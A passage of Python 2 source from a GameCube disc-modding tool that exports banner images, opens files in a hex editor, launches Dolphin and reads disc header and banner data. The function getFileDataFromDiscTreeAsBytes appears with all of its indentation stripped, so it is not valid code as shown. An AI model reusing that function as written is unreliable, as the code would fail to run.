		fileType = savePath[-3:].lower()
		if fileType == 'png' or fileType == 'tpl' or savePath == '': validExt = True
		else: msg( 'The banner may only be exported in PNG or TPL format.' )

	if not savePath:
		return # No actions beyond this point if no path was chosen above (i.e. the dialog box was canceled)

	# Collect more info on the texture and then create a file out of it.
	# The banner image data occupies 0x20-0x1820 of the file; hexlify converts it to a hex string.
	imageData = hexlify( globalBannerFile.data[0x20:0x1820] )

	try: # do da ting.
		success = True
		if fileType == 'tpl':
			tplImage = tplEncoder( imageDimensions=(96, 32), imageType=5 )
			tplImage.encodedImageData = imageData
			tplImage.encodedPaletteData = ''
			tplImage.createTplFile( savePath )
		else: # png
			pngImage = tplDecoder( imageDimensions=(96, 32), imageType=5, encodedImageData=imageData )
			pngImage.deblockify()
			pngImage.createPngFile( savePath, creator='DTW - v' + programVersion )
	except: success = False

	# Update the default directory to start in when opening or exporting files.
	settings.set( 'General Settings', 'defaultSearchDirectory', os.path.dirname(savePath) )
	with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )

	# Give an error message for any problems encountered.
	if not success:
		msg( "There was an unknown problem while exporting the banner." )
		updateProgramStatus( 'Export Error' )
	else: updateProgramStatus( 'Export Successful' )
def noDiscChangesToBeSaved():
	""" Checks for unsaved disc changes before closing the program or loading a new file.
		If any exist, asks the user whether to discard them. Returns True when it's safe
		to proceed (no changes, or the user agreed to forget them), False otherwise. """
	global unsavedDiscChanges

	# Nothing pending; safe to proceed
	if not unsavedDiscChanges:
		return True

	# Build a warning appropriate to the situation (closing vs. reloading)
	changeList = '\n'.join( unsavedDiscChanges )
	if programClosing:
		warning = "The changes below haven't been saved to disc. Are you sure you \nwant to close?\n\n" + changeList
	else:
		warning = 'The changes below will be forgotten if you change or reload the disc before saving. Are you sure you want to do this?\n\n' + changeList

	youShallPass = tkMessageBox.askyesno( 'Unsaved Changes', warning )

	if youShallPass:
		unsavedDiscChanges = [] # Forgets the past changes.
		#restoreEditedEntries()

	return youShallPass
def getHexEditorPath():
	""" Returns the path to the user's preferred hex editor, prompting for it (and
		saving it to the settings file) if it isn't set or the saved path no longer
		exists. May return an empty string if the user cancels the prompt. """

	# Check/ask for a specified hex editor to open files in.
	if not os.path.exists( settings.get( 'General Settings', 'hexEditorPath' ) ):
		popupWindow = PopupEntryWindow( Gui.root, message='Please specify the full path to your hex editor. '
			'(Specifying this path only needs to\nbe done once, and can be changed at any time in the settings.ini file.\nIf you have already set this, '
			"the path seems to have broken.)\n\nNote that this feature only shows you a copy of the data;\nany changes made will not be saved to the file or disc."
			'\n\nPro-tip: In Windows, if you hold Shift while right-clicking on a file, there appears a context menu \n'
			"""option called "Copy as path". This will copy the file's full path into your clipboard. Or if it's\na shortcut, """
			"""you can quickly get the full file path by right-clicking on the icon and going to Properties.""", title='Set hex editor path' )
		hexEditorPath = popupWindow.entryText.replace( '"', '' ) # Strip quotes, e.g. from a "Copy as path" value

		if hexEditorPath != '':
			# Update the path in the settings file and global variable.
			settings.set( 'General Settings', 'hexEditorPath', hexEditorPath )
			with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile ) # Updates a pre-existing settings file entry, or just creates a new file.
	else: hexEditorPath = settings.get( 'General Settings', 'hexEditorPath' )

	return hexEditorPath
def viewFileHexFromFileTree():
	""" Gets and displays hex data for a file within a disc in the user's hex editor of choice.
		Used by the ISO File Tree's context menu. """

	if not discDetected(): return

	iidSelectionsTuple = Gui.isoFileTree.selection()

	# Bug fix: an empty ttk Treeview selection is an empty tuple, not an empty string, so the
	# old check (== '') never matched. Using truthiness matches the checks used elsewhere here.
	if not iidSelectionsTuple:
		msg( 'No file is selected.' )
		return
	elif len( iidSelectionsTuple ) > 1:
		msg( 'Please choose only one file for this operation.' )
		return

	entity, isoOffset, fileSize, isoPath, source, data = Gui.isoFileTree.item( iidSelectionsTuple[0], 'values' )[1:] # Excluding description

	if len( iidSelectionsTuple ) == 1 and entity == 'file': # Ensures there's only one selection and it's not a folder.
		hexEditorPath = getHexEditorPath()
		if not hexEditorPath: return

		# Create a temporary file if this is not an external file already.
		if source == 'iso':
			# Open the disc image and retrieve the binary for the target file.
			with open( globalDiscDetails['isoFilePath'], 'rb') as isoBinary:
				isoBinary.seek( int(isoOffset, 16) )
				datData = bytearray( isoBinary.read( int(fileSize) ) ) #todo: test if this conversion is even needed
		elif source == 'path': # In this case, "data" is a filepath to an external file
			with open( data, 'rb') as origFile:
				datData = bytearray( origFile.read() )
		else: datData = bytearray.fromhex( data ) # source == 'ram'

		# Create a file name with folder names included, so that multiple files of the same name (but from different folders) can be opened.
		#fileName = '-'.join( isoPath.split('/')[1:] )
		fileName = isoPath.replace( '/', '-' )

		saveAndShowTempDatData( hexEditorPath, datData, fileName )

	else: msg( 'You must select a file for this operation (not a folder).' )
def viewDatFileHex():
	""" Gets and displays hex data of a loaded DAT file in the user's hex editor of choice.
		Used by the Structural Analysis tab. """

	# Nothing to show without a loaded file
	if not globalDatFile:
		msg( 'No DAT file has been loaded.' )
		return

	# Look up the user's hex editor; an empty path means they canceled the prompt
	editorProgramPath = getHexEditorPath()
	if editorProgramPath:
		saveAndShowTempDatData( editorProgramPath, globalDatFile.getFullData(), globalDatFile.fileName )
def saveAndShowTempDatData( hexEditorPath, datData, fileName ):
	""" Saves the given file data to a temporary file under DTW's bin folder, and opens
		it in the user's chosen hex editor as a separate process. This is only a copy
		of the data; edits made in the hex editor are not saved back anywhere. """

	# Save the file data to a temporary file.
	try:
		tempFilePath = scriptHomeFolder + '\\bin\\tempFiles\\' + fileName
		createFolders( os.path.split(tempFilePath)[0] )

		with open( tempFilePath, 'wb' ) as newFile:
			newFile.write( datData )
	except: # Pretty unlikely
		print 'Error creating temporary file for saveAndShowTempDatData()!'
		return

	# Open the temp file in the user's editor of choice.
	if os.path.exists( hexEditorPath ) and os.path.exists( tempFilePath ):
		# creationflags=0x08000000 is CREATE_NO_WINDOW (suppresses a console window on Windows)
		command = '"' + hexEditorPath + '" "' + tempFilePath + '"'
		subprocess.Popen( command, stderr=subprocess.STDOUT, creationflags=0x08000000 )
	else: msg( "Unable to find the specified hex editor program (or new temporary file). You may want to double check the path saved in DTW's settings.ini file." )
def runInEmulator():
	""" Launches the currently loaded disc in the user's emulator (Dolphin), prompting
		for (and saving) the emulator's path if it isn't already set or has broken. """

	# Check/ask for a specified program to open the file in.
	if not os.path.exists( settings.get( 'General Settings', 'emulatorPath' ) ):
		popupWindow = PopupEntryWindow( Gui.root, message='Please specify the full path to your emulator. '
			'(Specifying this path only needs to\nbe done once, and can be changed at any time in the settings.ini file.'
			'\nIf you have already set this, the path seems to have broken.)'
			'\n\nPro-tip: In Windows, if you hold Shift while right-clicking on a file, there appears a context \nmenu '
			"""option called "Copy as path". This will copy the file's full path into your clipboard. Or if it's a\nshortcut, """
			"""you can quickly get the full file path by right-clicking on the icon and going to Properties.""", title='Set Emulator Path' )
		emulatorPath = popupWindow.entryText.replace( '"', '' ) # Strip quotes, e.g. from a "Copy as path" value

		if emulatorPath != '':
			# Update the path in the settings file and global variable.
			settings.set( 'General Settings', 'emulatorPath', emulatorPath )
			with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile ) # Updates a pre-existing settings file entry, or just creates a new file.
	else:
		emulatorPath = settings.get( 'General Settings', 'emulatorPath' )

	if emulatorPath:
		# Check that there's a disc loaded, and that the emulator and disc have valid paths
		if not discDetected(): return
		elif not os.path.exists( emulatorPath ):
			msg( "Unable to find the Dolphin executable. You may want to double check the path saved in DTW's settings.ini file." )
		else:
			# Send the disc filepath to Dolphin
			# Must use '--exec'. Because '/e' is incompatible with Dolphin 5+, while '-e' is incompatible with Dolphin 4.x
			# '--batch' will prevent dolphin from unnecessarily scanning game/ISO directories, and will shut down Dolphin when the game is stopped.
			command = '"{}" --batch --exec="{}"'.format( emulatorPath, globalDiscDetails['isoFilePath'] )
			process = subprocess.Popen( command, shell=True, stderr=subprocess.STDOUT, creationflags=0x08000000 ) # shell=True gives access to all shell features.
#=================================#
# ~ ~ Primary Disc Operations ~ ~ #
#=================================#
def initializeDiscFileTree( refreshGui ):
	""" Called when first loading a disc or root folder, to clear/update the GUI. """
	global unsavedDiscChanges
	unsavedDiscChanges = []

	# Remove the background image if present
	Gui.isoFileTreeBg.place_forget()

	# Clear out all existing entries from the Disc File Tree
	for treeItem in Gui.isoFileTree.get_children():
		Gui.isoFileTree.delete( treeItem )

	# Optionally redraw now, so the user briefly sees the emptied tree (a nice small
	# indication that the iso is actually updating)
	if refreshGui:
		Gui.root.update()

	# Disable the buttons in the iso operations panel; they're re-enabled later if all
	# goes well, and stay disabled if there are problems loading a disc
	for opButton in Gui.isoOpsPanelButtons.winfo_children():
		#if opButton.winfo_class() == 'TButton':
		opButton.config( state='disabled' )

	# Reset the GUI's other values back to their defaults
	Gui.isoOffsetText.set( 'Disc Offset: ' )
	Gui.internalFileSizeText.set( 'File Size: ' )
	Gui.internalFileSizeLabelSecondLine.set( '' )
def getDiscSystemFileInfo( isoPath, apploaderPath='' ):
	""" Collects basic info on system files in the disc, including file location/size for the DOL/FST, and the FST's data.
		If apploaderPath is provided, it means a root folder is being scanned, and isoPath will instead be a file path
		to a boot.bin or iso.hdr file.

		Returns ( gameId, dolOffset, fstOffset, dolSize, fstSize, fstData, apploaderSize ),
		where fstData is a hex string (empty when scanning a root folder). """

	# Read basic stats from the ISO directly.
	with open( isoPath, 'rb') as isoBinary:
		gameId = isoBinary.read(6).decode( 'utf-8' ) # Game ID is the first 6 bytes of the disc/boot file
		globalDiscDetails['gameId'] = gameId

		# Get info on the DOL and the game's FST/TOC (File System Table/Table of Contents).
		isoBinary.seek( 0x420 )
		dolOffset = toInt( isoBinary.read(4) )
		fstOffset = toInt( isoBinary.read(4) )
		dolSize = fstOffset - dolOffset # NOTE(review): assumes the FST directly follows the DOL -- confirm
		fstSize = toInt( isoBinary.read(4) )
		#maxFstSize = toInt( isoBinary.read(4) )

		# Get components to calculate the apploader size
		if apploaderPath == '': # Scanning a disc file (ISO/GCM)
			isoBinary.seek( 0x2454 )
			codeSize = toInt( isoBinary.read(4) )
			trailerSize = toInt( isoBinary.read(4) )

			# Get the FST data
			isoBinary.seek( fstOffset )
			fstData = isoBinary.read( fstSize ).encode( 'hex' )
		else: # Scanning a root folder; read the apploader's sizes from its own file
			with open( apploaderPath, 'rb' ) as apploaderBinary:
				apploaderBinary.seek( 0x14 )
				codeSize = toInt( apploaderBinary.read(4) )
				trailerSize = toInt( apploaderBinary.read(4) )
			fstData = ''

	# Calculate the apploader's size
	apploaderSize = roundTo32( codeSize + trailerSize )

	return gameId, dolOffset, fstOffset, dolSize, fstSize, fstData, apploaderSize
def getFileDataFromDiscTree( iid='', iidValues=() ): # Returns the file data in hex-string form.
	""" Retrieves a file's data from the Disc File Tree, as a hex string.
		Either an iid (treeview item id) or an iidValues tuple of
		( entity, isoOffset, fileSize, source, data ) must be provided.
		Returns None if neither is given, the item is a folder, or the
		backing disc/external file can no longer be found. """

	if iid:
		if Gui.isoFileTree.exists( iid ):
			_, entity, isoOffset, fileSize, _, source, data = Gui.isoFileTree.item( iid, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data
		else: return None
	elif iidValues: entity, isoOffset, fileSize, source, data = iidValues
	else: return None # raise IOError( 'An iid or a set of iidValues must be provided to getFileDataFromDiscTree' )

	# Enough info is available; pull the file.
	if entity == 'file':
		if source == 'iso':
			if os.path.exists( globalDiscDetails['isoFilePath'] ):
				# Open the disc image and retrieve the binary for the target file.
				with open( globalDiscDetails['isoFilePath'], 'rb') as isoBinary:
					isoBinary.seek( int(isoOffset, 16) )
					fileHex = isoBinary.read( int(fileSize) ).encode('hex')
			else: return None #msg( 'The disc that this file resided in can no longer be found (it may have been moved/renamed/deleted).' )
		elif source == 'ram':
			fileHex = data # Already stored as a hex string
		else: # source == 'path', meaning data is a filepath to an external file
			if os.path.exists( data ):
				with open( data, 'rb') as externalFile:
					fileHex = externalFile.read().encode( 'hex' )
			else: return None #msg( 'The externally referenced file at "' + data + '" can no longer be found (it may have been moved/renamed/deleted).' )
		return fileHex
	else: return None # Item is a folder
def getFileDataFromDiscTreeAsBytes( iid='', iidValues=() ): # Returns the file data in bytearray form (should migrate all data manipulations to this methodology).
if iid:
if Gui.isoFileTree.exists( iid ):
_, entity, isoOffset, fileSize, _, source, data = Gui.isoFileTree.item( iid, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data
else:
print 'getFileDataFromDiscTreeAsBytes(): Could not find the given iid, {}, in the treeview.'.format( iid )
return None
elif iidValues: entity, isoOffset, fileSize, source, data = iidValues
else: return None # raise IOError( 'An iid or a set of iidValues must be provided to getFileDataFromDiscTree' )
if entity != 'file': return None
# Enough info is available; pull the file.
if source == 'iso':
if os.path.exists( globalDiscDetails['isoFilePath'] ):
# Open the disc image and retrieve the binary for the target file.
with open( globalDiscDetails['isoFilePath'], 'rb') as isoBinary:
isoBinary.seek( int(isoOffset, 16) )
byteData = bytearray( isoBinary.read( int(fileSize) ) )
else:
print 'getFileDataFromDiscTreeAsBytes(): Disc could not be found.'
return None #msg( 'The disc that this file resided in can no longer be found (it may have been moved/renamed/deleted).' )
elif source == 'ram':
byteData = bytearray.fromhex( data ) # Exists as a hex string
else: # source == 'path', meaning data is a filepath to an external file
if os.path.exists( data ):
with open( data, 'rb') as externalFile:
byteData = bytearray( externalFile.read() )
else: return None #msg( 'The externally referenced file at "' + data + '" can no longer be found (it may have been moved/renamed/deleted).' )
return byteData
def getFileSizeFromDiscTree( iid ): # Returns an int for the file size, in bytes
	""" Returns the size in bytes of the file for the given treeview iid.
		Folders, and files whose external source file has gone missing, report 0. """

	assert Gui.isoFileTree.exists( iid ), 'Nonexistant file requested for getFileSizeFromDiscTree'
	_, entity, _, fileSize, _, source, data = Gui.isoFileTree.item( iid, 'values' )

	# Folders have no size of their own
	if entity != 'file':
		return 0

	if source == 'iso':
		return int( fileSize )
	elif source == 'ram':
		return len( data )/2 # data is a hex string; two characters per byte

	# source == 'path', meaning data is a filepath to an external file
	if os.path.exists( data ):
		return int( os.path.getsize( data ) )

	# Failsafe; the external file has gone missing
	msg( 'The externally referenced file at "' + data + '" can no longer be found (it may have been moved/renamed/deleted).' )
	return 0
def updateBannerFileInfo( updateTextEntries=True, imageName='' ):
	""" Updates the banner image and its associated text fields (game title/maker/description)
		on the Disc File Tree and Disc Details tabs, using the currently loaded banner file
		(globalBannerFile). If a banner is currently visible, it's removed with a vertical-fade
		animation and the new one is shown with a random-pixel dissolve; otherwise the canvases
		are simply cleared and redrawn.

		updateTextEntries: also clear and repopulate the text fields decoded from the banner file.
		imageName: the disc's image name string, inserted into gameName1Field when the banner
		file's source is a disc.

		Re-entrancy: guarded by the module globals updatingBannerFileInfo /
		stopAndReloadBannerFileInfo; a call made while an update is in progress sets a flag
		that makes the running instance abort mid-animation and restart itself. """

	global updatingBannerFileInfo, stopAndReloadBannerFileInfo

	# Prevent conflicts with an instance of this function that may already be running (let that instance finish its current iteration and call this function again)
	if updatingBannerFileInfo:
		stopAndReloadBannerFileInfo = True
		return
	updatingBannerFileInfo = True

	if updateTextEntries:
		# Delete existing content in the GUI
		Gui.gameName1Field['state'] = 'normal' # Must be enabled before can edit, even programmatically
		Gui.gameName1Field.delete( '1.0', 'end' )
		Gui.shortTitle.set( '' )
		Gui.shortMaker.set( '' )
		Gui.longTitle.set( '' )
		Gui.longMaker.set( '' )
		Gui.gameDescField.delete( '1.0', 'end' )

	# Determine if an animation will be used, and where, by checking if it would be visible to the user
	currentlySelectedTab = Gui.root.nametowidget( Gui.mainTabFrame.select() )
	if currentlySelectedTab == Gui.discTab: canvasToAnimate = Gui.bannerCanvas
	elif currentlySelectedTab == Gui.discDetailsTab: canvasToAnimate = Gui.bannerCanvas2
	else: canvasToAnimate = None

	if canvasToAnimate and canvasToAnimate.bannerGCstorage: # An existing banner image is currently visible
		# Remove the banner on the opposite disc tab
		if currentlySelectedTab == Gui.discTab: Gui.bannerCanvas2.delete('all')
		elif currentlySelectedTab == Gui.discDetailsTab: Gui.bannerCanvas.delete('all')

		# Remove the banner on the current disc tab using a vertical fade
		width, height = canvasToAnimate.pilImage.size
		pixels = canvasToAnimate.pilImage.load()
		bandHeight = 30 # Height in pixels of the fade gradient band swept down the image

		for y in xrange( height + bandHeight ):
			# If a new update request arrived mid-animation, abort and restart with the current arguments
			if stopAndReloadBannerFileInfo:
				updatingBannerFileInfo = False
				stopAndReloadBannerFileInfo = False
				updateBannerFileInfo( updateTextEntries, imageName )
				return

			for bandSegment in xrange( bandHeight ): # This will modify the current row, and then prior rows (up to the bandHeight)
				targetRow = y - bandSegment

				if targetRow >= 0 and targetRow < height:
					# Reduce each pixel's alpha in this row, proportional to its position within the band
					for x in xrange( width ):
						initialAlpha = pixels[x, targetRow][3]
						newAlpha = int( initialAlpha - ( float(bandSegment)/bandHeight * initialAlpha ) )
						#if x == 0: print 'row', targetRow, ':', initialAlpha, 'to', newAlpha
						pixels[x, targetRow] = pixels[x, targetRow][:3] + (newAlpha,)

			# Push this frame of the fade to the canvas
			canvasToAnimate.bannerGCstorage = ImageTk.PhotoImage( canvasToAnimate.pilImage )
			canvasToAnimate.itemconfig( canvasToAnimate.canvasImageItem, image=canvasToAnimate.bannerGCstorage )
			canvasToAnimate.update() # update_idletasks
			time.sleep( .0005 ) # 500 us

		canvasToAnimate.delete('all')
		time.sleep( .4 )

	else: # No banner currently visible. Clear the canvases
		Gui.bannerCanvas.delete('all')
		Gui.bannerCanvas2.delete('all')

	# Make sure there's banner file data
	if not globalBannerFile.data:
		# Delete the remainder of the content in the GUI and return
		Gui.bannerCanvas.pilImage = None
		Gui.bannerCanvas.bannerGCstorage = None
		Gui.bannerCanvas.canvasImageItem = None
		Gui.bannerCanvas2.pilImage = None
		Gui.bannerCanvas2.bannerGCstorage = None
		Gui.bannerCanvas2.canvasImageItem = None
		updatingBannerFileInfo = False
		return

	if updateTextEntries:
		# Choose a text encoding based on the disc's country code
		if Gui.countryCode.get() == 'us': encoding = 'latin_1' # Decode assuming English or other European countries
		else: encoding = 'shift_jis' # The country code is 'jp', for Japanese.

		# Get the raw hex from the file and decode it, splitting on the first stop byte
		Gui.shortTitle.set( globalBannerFile.data[0x1820:(0x1820 + 0x20)].split('\x00')[0].decode(encoding) )
		Gui.shortMaker.set( globalBannerFile.data[0x1840:(0x1840 + 0x20)].split('\x00')[0].decode(encoding) )
		Gui.longTitle.set( globalBannerFile.data[0x1860:(0x1860 + 0x40)].split('\x00')[0].decode(encoding) )
		Gui.longMaker.set( globalBannerFile.data[0x18a0:(0x18a0 + 0x40)].split('\x00')[0].decode(encoding) ) # Can be a name or description
		Gui.gameDescField.insert( '1.0', globalBannerFile.data[0x18e0:(0x18e0 + 0x80)].split('\x00')[0].decode( encoding ) )

		if globalBannerFile.source == 'disc':
			Gui.gameIdTextEntry.enableEntry()

			# Update the gameName1Field
			# Doing this here rather than prior functions for aesthetics; here, the text will populate at the same time as the other text.
			Gui.gameName1Field.insert( '1.0', imageName )
		else:
			Gui.gameIdTextEntry.disableEntry()

			# Update the gameName1Field
			Gui.gameName1Field.insert( '1.0', "\t\t[ This isn't located in the banner file. \n\t\t Open your disc to edit this entry. ]" )

		Gui.gameName1Field['state'] = 'disabled' # Must be disabled only after editing

	# Read and decode the banner image data (96x32 pixels, starting at offset 0x20 of the banner file)
	bannerImage = tplDecoder( imageDimensions=(96, 32), imageType=5, encodedImageData=globalBannerFile.data[0x20:0x1820] )
	bannerImage.deblockify() # This decodes the image data, to create an rgbaPixelArray.

	# Build a PIL image from the decoded pixels; both canvases share the same image objects
	Gui.bannerCanvas.pilImage = Image.new( 'RGBA', (96, 32) )
	Gui.bannerCanvas.pilImage.putdata( bannerImage.rgbaPixelArray )
	Gui.bannerCanvas.bannerGCstorage = ImageTk.PhotoImage( Gui.bannerCanvas.pilImage ) # To prevent garbage collection from deleting the image (including after image modification/replacement)
	Gui.bannerCanvas2.pilImage = Gui.bannerCanvas.pilImage
	Gui.bannerCanvas2.bannerGCstorage = Gui.bannerCanvas.bannerGCstorage

	if canvasToAnimate:
		# Add the banner on the opposite disc tab (instantly; no animation)
		if currentlySelectedTab == Gui.discTab:
			Gui.bannerCanvas2.canvasImageItem = Gui.bannerCanvas2.create_image( 0, 0, image=Gui.bannerCanvas2.bannerGCstorage, anchor='nw' )
		elif currentlySelectedTab == Gui.discDetailsTab:
			Gui.bannerCanvas.canvasImageItem = Gui.bannerCanvas.create_image( 0, 0, image=Gui.bannerCanvas.bannerGCstorage, anchor='nw' )

		# Add the banner on the current tab using a dissolve fade.
		# First, create a blank image on the canvas
		dissolvingImage = Image.new( 'RGBA', (96, 32), (0,0,0,0) )
		canvasToAnimate.canvasImageItem = canvasToAnimate.create_image( 0, 0, image=ImageTk.PhotoImage(dissolvingImage), anchor='nw' )
		dessolvingPixels = dissolvingImage.load()
		width, height = 96, 32

		# Display the converted image
		bannerPixels = canvasToAnimate.pilImage.load()
		pixelsToUpdatePerPass = 172
		pixelsNotShown = [ (x, y) for x in range(width) for y in range(height) ] # Creates a list of all possible pixel coordinates for the banner image

		while pixelsNotShown:
			# If a new update request arrived mid-animation, abort and restart with the current arguments
			if stopAndReloadBannerFileInfo:
				updatingBannerFileInfo = False
				stopAndReloadBannerFileInfo = False
				updateBannerFileInfo( updateTextEntries, imageName )
				return

			# Randomly pick out some pixels to show
			pixelsToShow = []
			while len( pixelsToShow ) < pixelsToUpdatePerPass and pixelsNotShown:
				randomIndex = random.randint( 0, len(pixelsNotShown) - 1 )
				pixelsToShow.append( pixelsNotShown[randomIndex] )
				del pixelsNotShown[randomIndex]

			# Ease the animation out by revealing fewer pixels with each successive pass
			if pixelsToUpdatePerPass > 2: pixelsToUpdatePerPass -= math.sqrt( pixelsToUpdatePerPass )/2

			# Update the chosen pixels
			for pixelCoords in pixelsToShow: dessolvingPixels[pixelCoords] = bannerPixels[pixelCoords]

			# Update the GUI
			canvasToAnimate.bannerGCstorage = ImageTk.PhotoImage( dissolvingImage )
			canvasToAnimate.itemconfig( canvasToAnimate.canvasImageItem, image=canvasToAnimate.bannerGCstorage )
			canvasToAnimate.update()
			time.sleep( .022 )

		canvasToAnimate.canvasImageItem = canvasToAnimate.create_image( 0, 0, image=canvasToAnimate.bannerGCstorage, anchor='nw' )

	else: # No animation; just add the banner to the GUI
		Gui.bannerCanvas.canvasImageItem = Gui.bannerCanvas.create_image( 0, 0, image=Gui.bannerCanvas.bannerGCstorage, anchor='nw' )
		Gui.bannerCanvas2.canvasImageItem = Gui.bannerCanvas2.create_image( 0, 0, image=Gui.bannerCanvas2.bannerGCstorage, anchor='nw' )

	updatingBannerFileInfo = False
def reloadBanner():
	""" This is solely used by the radio buttons for file encoding on the Disc Details Tab;
		selecting one of those encodings should reload the banner file with that encoding. """

	# Nothing to do if no banner file appears to be loaded
	if not globalBannerFile or not globalBannerFile.data:
		return

	# Preserve the current image name text; the get() method seems to add a trailing line break, so drop it
	currentImageName = Gui.gameName1Field.get( '1.0', 'end' )[:-1]

	updateBannerFileInfo( imageName=currentImageName )
def populateDiscDetails( discSize=0 ):
	""" This primarily updates the Disc Details Tab using information from boot.bin/ISO.hdr; it directly handles
		updating the fields for disc filepath, gameID (and its breakdown), region and version, image name,
		20XX version (if applicable), and disc file size.
		The disc's country code is also found, which is used to determine the encoding of the banner file.
		A call to update the banner image and other disc details is also made in this function.
		This function also updates the disc filepath on the Disc File Tree tab (and the hover/tooltip text for it).

		discSize: if given (non-zero), used as the disc's size in bytes rather than stat'ing the
		file on disk; this is the case when a root folder was opened rather than a disc image. """

	missingFiles = [] # Names of expected system files that couldn't be pulled; reported to the user at the end

	# Update the filepath field in the GUI, and create a shorthand string that will fit nicely on the Disc File Tree tab
	Gui.isoDestination.set( globalDiscDetails['isoFilePath'] )
	frameWidth = Gui.isoOverviewFrame.winfo_width()
	accumulatingName = ''
	# Grow the shorthand from the END of the path, one character at a time, until it no longer fits in the frame
	for character in reversed( globalDiscDetails['isoFilePath'] ):
		accumulatingName = character + accumulatingName
		Gui.isoPathShorthand.set( accumulatingName )
		if Gui.isoPathShorthandLabel.winfo_reqwidth() > frameWidth:
			# Reduce the path to the closest folder (that fits in the given space)
			normalizedPath = os.path.normpath( accumulatingName[1:] )
			if '\\' in normalizedPath: Gui.isoPathShorthand.set( '\\' + '\\'.join( normalizedPath.split('\\')[1:] ) )
			else: Gui.isoPathShorthand.set( '...' + normalizedPath[3:] ) # Filename is too long to fit; show as much as possible
			break
	ToolTip( Gui.isoPathShorthandLabel, globalDiscDetails['isoFilePath'], delay=500, wraplength=400, follow_mouse=1 )

	# Look up info within boot.bin (gameID, disc version, and disc region)
	bootBinData = getFileDataFromDiscTreeAsBytes( iid=scanDiscForFile('boot.bin') )
	if not bootBinData:
		missingFiles.append( 'boot.bin or ISO.hdr' )
		Gui.gameIdText.set( '' )
		Gui.isoVersionText.set( '' )
		imageName = ''
	else:
		gameId = bootBinData[:6].decode( 'ascii' ) # First 6 bytes
		Gui.gameIdText.set( gameId )
		versionHex = hexlify( bootBinData[7:8] ) # Byte 7
		ntscRegions = ( 'A', 'E', 'J', 'K', 'R', 'W' ) # 4th character of the game ID is the region code
		if gameId[3] in ntscRegions: Gui.isoVersionText.set( 'NTSC 1.' + versionHex )
		else: Gui.isoVersionText.set( 'PAL 1.' + versionHex )
		imageName = bootBinData[0x20:0x20 + 0x3e0].split('\x00')[0].decode( 'ascii' ) # Splitting on the first stop byte

	# Get Bi2.bin and check the country code (used to determine encoding for the banner file)
	bi2Iid = scanDiscForFile( 'bi2.bin' ) # This will try for 'iso.hdr' if bi2 doesn't exist
	bi2Data = getFileDataFromDiscTreeAsBytes( iid=bi2Iid )

	if not bi2Data:
		missingFiles.append( 'bi2.bin or ISO.hdr' )
	else:
		# Depending on which file is used, get the location/offset of where the country code is in the file
		if bi2Iid.endswith( 'iso.hdr' ): countryCodeOffset = 0x458 # (0x440 + 0x18)
		else: countryCodeOffset = 0x18

		# Set the country code
		if toInt( bi2Data[countryCodeOffset:countryCodeOffset+4] ) == 1: Gui.countryCode.set( 'us' )
		else: Gui.countryCode.set( 'jp' )

	# Remove the existing 20XX version label (the label displayed next to the StringVar, not the StringVar itself), if it's present.
	for widget in Gui.discDetailsTab.row2.winfo_children():
		thisWidgets = widget.grid_info()
		# NOTE(review): grid_info values are compared as strings here — presumably this Tk version returns them as strings; verify if upgrading Tkinter
		if thisWidgets['row'] == '1' and ( thisWidgets['column'] == '8' or thisWidgets['column'] == '9' ):
			widget.destroy()

	# Update the 20XX version label
	if globalDiscDetails['is20XX']:
		twentyxxLabel = ttk.Label( Gui.discDetailsTab.row2, text='20XX Version:' )
		twentyxxLabel.grid( column=8, row=1, sticky='e', padx=Gui.discDetailsTab.row2.padx )
		twentyxxLabel.bind( '<Enter>', lambda event: setDiscDetailsHelpText('20XX Version') )
		twentyxxLabel.bind( '<Leave>', setDiscDetailsHelpText )
		twentyxxVersionLabel = ttk.Label( Gui.discDetailsTab.row2, text=globalDiscDetails['is20XX'] )
		twentyxxVersionLabel.grid( column=9, row=1, sticky='w', padx=Gui.discDetailsTab.row2.padx )
		twentyxxVersionLabel.bind( '<Enter>', lambda event: setDiscDetailsHelpText('20XX Version') )
		twentyxxVersionLabel.bind( '<Leave>', setDiscDetailsHelpText )

	# Load the banner and other info contained within the banner file
	bannerIid = scanDiscForFile( 'opening.bnr' )
	if not bannerIid:
		missingFiles.append( 'opening.bnr' )
	else:
		global globalBannerFile
		globalBannerFile = hsdFiles.datFileObj( source='disc' )
		fileName = os.path.basename( Gui.isoFileTree.item( bannerIid, 'values' )[4] ) # Using isoPath (will probably be all lowercase anyway)
		globalBannerFile.load( bannerIid, fileData=getFileDataFromDiscTreeAsBytes( iid=bannerIid ), fileName=fileName )
		updateBannerFileInfo( imageName=imageName )

	# Get and display the disc's total file size
	if discSize: # If this was provided, it's a root folder that's been opened (and this value is a predicted one)
		isoByteSize = discSize
	else: isoByteSize = os.path.getsize( globalDiscDetails['isoFilePath'] )
	isoSize = "{:,}".format( isoByteSize )
	Gui.isoFilesizeText.set( isoSize + ' bytes' )
	Gui.isoFilesizeTextLine2.set( '(i.e.: ' + "{:,}".format(isoByteSize/1048576) + ' MB, or ' + humansize(isoByteSize) + ')' )

	# Alert the user of any problems detected
	if missingFiles: msg( 'Some details of the disc could not be determined, because the following files could not be found:\n\n' + '\n'.join(missingFiles) )
def get20xxRandomNeutralNameOffset( fullFileName ):
	""" Recognizes stages within the set of 'Random Neutrals' (The sets of 16 stages for each legal neutral stage),
		and then returns the MnSlChr file offset of the stage name table for the stage in question, as well as the
		base stage name (e.g. a string of "Dream Land (N64)"). Returns ( -1, '' ) if the stage is not among the
		random neutrals (including for versions of 20XX older than 4.06, which don't use the MnSlChr name table). """

	nameOffset = -1
	baseStageName = ''
	fileName, fileExt = os.path.splitext( fullFileName )
	fileExt = fileExt.lower()

	# Convert the 20XX game version string (e.g. '4.07++') to a float for comparison
	try:
		normalizedVersion = float( ''.join([char for char in globalDiscDetails['is20XX'] if char.isdigit() or char == '.']) ) # removes non-numbers and typecasts it
	except (ValueError, TypeError): # e.g. an empty/garbage version string, or a non-string value; treat as "not a recognized 20XX version"
		normalizedVersion = 0

	if 'BETA' not in globalDiscDetails['is20XX'] and normalizedVersion >= 4.06: # This version and up use a table in MnSlChr
		tableOffsets = { # Offsets for stage name pointer tables (accounts for file header)
			'GrNBa': 0x3C10E0, # Battlefield
			'GrNLa': 0x3C1340, # Final Destination
			'GrSt': 0x3C15A0, # Yoshi's Story
			'GrIz': 0x3C1800, # Fountain
			'GrOp': 0x3C1A60, # Dream Land
